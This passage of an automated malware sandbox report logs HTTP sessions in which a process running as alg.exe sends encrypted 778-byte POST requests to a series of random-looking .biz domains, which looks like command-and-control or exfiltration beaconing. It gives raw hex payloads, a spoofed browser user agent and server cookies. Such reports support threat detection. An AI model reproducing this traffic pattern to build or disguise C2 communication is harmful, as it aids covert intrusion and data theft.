                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.119709969 CET778OUTData Raw: 7f 33 80 0b 02 88 24 73 fe 02 00 00 d6 c3 6c b1 e6 b7 85 72 84 bb 9e 59 b3 5b db be ab 98 65 73 15 fa 10 34 0f 64 65 db bd 90 e1 ad 1d df 6e 24 f2 45 87 4b 3d d7 2a 3c 48 38 bb ef 51 4d 63 e7 00 6f ed 95 f1 a1 f2 a4 1d d3 93 dc a5 fc 25 8d ab 1a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3$slrY[es4den$EK=*<H8QMco%tFp;O*;uf<>{aR e7Z~1{=-`Av<mN%*}'f|n>?XZ_R\x|%$,C:U[(!/@q8dY6
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.084430933 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0134dca36b22c34b826b96b499252ed9|155.94.241.188|1730129932|1730129932|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        80192.168.2.45007454.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.209602118 CET357OUTPOST /rsijdbfgctvawkab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.209625959 CET778OUTData Raw: bc 42 81 fc d8 8f fa b5 fe 02 00 00 7f ed 7c b9 ec 35 cb 7c 4f b0 c5 e5 23 11 aa dd 1e f2 fa b0 80 b1 f3 88 25 be 99 f4 b3 a3 f1 cc 22 34 f9 eb 16 c8 52 da 9e e6 6c a2 7a fa ce 56 50 cd c7 1a b0 8d b0 bb 37 e3 d5 dd 34 24 fc 06 50 cc ce 69 41 36
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B|5|O#%"4RlzVP74$PiA6#1|B_>^`<8(bb4nl(sjtcZ{Q9E*o#)+G%v+c\1%0D|Uv5L>)i,xU
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.043091059 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f01c7e18338592f47a0c5df14f801896|155.94.241.188|1730129933|1730129933|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        81192.168.2.45008054.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.068969965 CET343OUTPOST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.068969965 CET778OUTData Raw: 80 69 72 b9 b4 7f 57 d9 fe 02 00 00 1d 68 c0 ab 9e 68 3f 4e 9f f2 f0 90 5a b6 e1 e8 13 61 ae 62 ff 96 25 1c 12 d6 9c e7 4f b1 40 51 d4 21 93 d1 91 7f 3d a1 b5 5c d8 ad 15 38 0c 0e 66 f4 6b b6 a6 a2 c3 e4 e4 a9 0a 9f d5 00 51 67 e9 53 14 8f 56 96
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: irWhh?NZab%O@Q!=\8fkQgSVO9#'FooySA8tD9r2DocAr"={9s)Zis{2!]8.uY0.\S_h+E!D6N-
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.908963919 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ee72b2519f7f117a458e5e6365f5ea98|155.94.241.188|1730129934|1730129934|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        82192.168.2.45008418.246.231.120806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.932168007 CET346OUTPOST /myqrw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.932190895 CET778OUTData Raw: f4 88 fd 3f 09 aa ba de fe 02 00 00 49 ee 08 a8 56 5d 5f bb d7 53 f1 a3 62 d8 6b 95 d0 81 33 04 89 45 14 ff 2d 3c 7c 05 9a 9d 40 d4 51 95 c0 92 25 f7 f6 fc 14 93 b2 9b de 70 5f 73 25 0c 40 82 63 f3 43 aa 0f 14 36 5e 42 2c 38 4b df 32 83 e6 81 ad
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?IV]_Sbk3E-<|@Q%p_s%@cC6^B,8K2d+d!6\YH<eorMSjfcgTBE.,!^t*=pk!:JY)#q/aWq@!~MVj:69d{]eQG
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.755356073 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ffee5ed3507287c25aaafbb5eae8d2b9|155.94.241.188|1730129935|1730129935|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        83192.168.2.45008518.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.781877995 CET346OUTPOST /bf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.781934977 CET778OUTData Raw: 01 1a 83 db 0b fe 0f cc fe 02 00 00 a6 1d c6 e8 3c 70 36 f5 a7 a7 a1 8e 42 96 81 c2 0e e0 45 dd b5 d8 79 e5 51 0a 90 da 53 14 58 85 e9 5d 04 f1 9b 69 57 cc 7b a7 a8 94 71 0d a6 b8 c8 08 e3 32 a2 82 2d ce 8f cb 12 55 04 d2 65 81 fe 65 6b 0f 42 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <p6BEyQSX]iW{q2-UeekB_ZpMgFBCR,vj)zICWNkDgso(|=bO?6jB#~'qA"Zlh:W=:mGzv\wAtv=/1Sbq,zL(YL
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.442166090 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=505aa72a51f3e6007ee0d2fda055c7ea|155.94.241.188|1730129936|1730129936|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        84192.168.2.45008644.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.556308031 CET357OUTPOST /oluilwxotdxeiqq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.556386948 CET778OUTData Raw: 8e f2 eb 81 6d 0b ba 07 fe 02 00 00 4b 6d ce a3 31 85 62 e8 ec 71 1c 61 21 16 7b fb 55 48 6f 8f 22 58 07 8e 08 5f 3a 6d 49 bb 91 33 1d ce 15 9c 07 91 2f 20 38 3b 5c d1 76 44 14 20 21 d1 df 1d 0e a9 6c 29 55 5e 1e 3f d8 7c 11 a5 ae a9 c9 bd d5 37
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mKm1bqa!{UHo"X_:mI3/ 8;\vD !l)U^?|7lR6.ogw@kH^*0#<Dvua5(0iI+py>`7j=OwTK>Q2L4B8`BCes@(1uWU$i%G%$|
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.232316017 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2cae760ef4d2a471e7feb9e0412b2411|155.94.241.188|1730129937|1730129937|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        85192.168.2.45008772.52.178.23806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278640032 CET352OUTPOST /ajifdwkq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278656006 CET778OUTData Raw: b7 de 56 94 96 4b 2d f0 fe 02 00 00 19 d7 8d c3 ad 16 2c 6f 53 35 8d 94 44 38 bf 63 c0 ee 7a de 83 c6 bc ca 4f 3b f4 e4 7a 06 32 96 8b a0 62 c9 dc 6a 2a c7 b7 b3 d0 82 16 c5 b8 9f de 98 74 7c cb fc 63 7b 28 5b f8 c3 80 03 f6 7e 26 96 bf a4 ab f8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: VK-,oS5D8czO;z2bj*t|c{([~&lK\8>+si8uKUw*]=H!!:V8`1(@!P%hK\eW1c3f}g3'c6R|NN:^w7g'1D!,f&gkr'Z1CH


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        86192.168.2.45008872.52.178.23806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969413042 CET354OUTPOST /exoigpwxtw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969492912 CET778OUTData Raw: c9 9d a9 9b 71 1c 05 3d fe 02 00 00 d9 27 e8 23 c6 d3 46 20 47 cc 3a 5a 24 dc 03 67 39 64 27 49 79 c3 38 78 c1 1a fc 73 c8 a5 f6 01 f0 32 e1 6c 7a 41 b2 99 80 3b c2 1e b8 a6 ca f3 28 6c 5c 67 de 79 02 e9 98 74 e1 fe 9d ff cf 10 cc 6a cc 4b 74 c3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: q='#F G:Z$g9d'Iy8xs2lzA;(l\gytjKtl,AHGyWi~g<}]F9@\;WLx_!_o&3TO8N@"d:x7J|vW;+9sBI~m-b{8f/'Pm}dxLj?


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        87192.168.2.45008944.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707676888 CET349OUTPOST /vhkxrtp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707676888 CET778OUTData Raw: 26 4f 97 a4 43 c8 00 31 fe 02 00 00 77 96 fb 41 c7 88 14 b4 13 fd 0a d9 af aa b5 81 39 2e fd 99 bb 8f 3b fe f6 fe b5 84 23 68 ee 56 b1 f9 91 17 c0 9b ac 43 f8 45 09 7c 43 b9 6a 24 e9 7a 76 ff 8e 36 19 ef b1 25 d6 27 5f 71 da 48 b8 97 4f c1 7d 09
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &OC1wA9.;#hVCE|Cj$zv6%'_qHO}<IP_qe@wJl\q`\c,77|YcZmU_B@IXX|O}v~TD4!&;{grl|/x)IG}}u|,xn[e'~);eV
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.369520903 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5df0915435aa647c68e9be668215ff49|155.94.241.188|1730129939|1730129939|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        88192.168.2.45009018.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389998913 CET351OUTPOST /chcelg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.390033960 CET778OUTData Raw: 35 12 22 ab d3 42 af ee fe 02 00 00 66 5f 00 00 01 d6 8f 08 68 d3 e0 e3 3b bd 4c 10 d6 74 40 84 6f 99 98 f6 be 1a 87 9d aa b9 57 6d 51 97 36 81 45 da 72 4f b6 57 20 37 4b a9 0f de 38 c7 4b 8d 91 86 52 af 75 85 90 de 33 3c c8 94 85 30 d0 94 81 0d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5"Bf_h;Lt@oWmQ6ErOW 7K8KRu3<0Rx"J2OTaJS"%?FHVeB?iw>*7>/>S-sbT4T{6y z|w:A|ky+.z&IO(1q:]7(M}
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.845782042 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=bdd9c9384dc4b3b35ea3fabe2c7da7d3|155.94.241.188|1730129940|1730129940|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        89192.168.2.45009118.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867338896 CET356OUTPOST /vwhigqqruvsekwy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867340088 CET778OUTData Raw: 6e a4 de 8f 8f c0 4d 3c fe 02 00 00 74 91 ba 1c ea ac dc 79 d4 a2 b8 23 a1 7f c6 78 96 df 37 22 57 98 41 75 9a c8 17 55 56 7e 38 8f 91 b9 c2 02 e1 d0 29 6c 84 63 7d eb 45 f0 fd cd 10 d2 aa 05 4e d0 40 ca 13 f4 a9 1e 5e 09 96 de 84 cb dc 75 aa 96
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: nM<ty#x7"WAuUV~8)lc}EN@^uV8Fb'$gydf74v|\gev]1sk'rqHk$lrPbwDX+Jk9aG-YDOtkd(<:-9


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        90192.168.2.45009218.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350792885 CET348OUTPOST /gsepgks HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350812912 CET778OUTData Raw: e6 40 ae 22 fd 74 e8 35 fe 02 00 00 b8 b8 a8 da ad 7b a7 6a 0a b5 d8 89 f9 bf 58 39 f9 43 79 03 24 da 28 b0 31 2d d1 a4 bf d6 d9 9d a3 62 65 18 2f 5c 00 f4 00 0b 87 ce 19 6f 4a 65 23 71 59 e6 17 6f dd 85 5c c5 70 91 c8 ff 07 85 53 28 16 09 57 17
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: @"t5{jX9Cy$(1-be/\oJe#qYo\pS(W4-W\R&;EQuER8lm-@%xi/w[9g_B&(r|H BZ<e\|]wC9.0])A<`C,enP3O%\(
